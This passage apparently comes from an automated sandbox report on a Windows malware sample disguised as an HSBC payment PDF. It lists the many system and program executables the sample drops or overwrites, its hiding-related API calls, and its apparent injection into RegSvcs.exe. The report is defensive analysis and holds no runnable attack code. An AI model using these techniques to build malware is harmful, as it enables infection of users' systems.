              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Creates files inside the volume driver (system volume information)
              Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
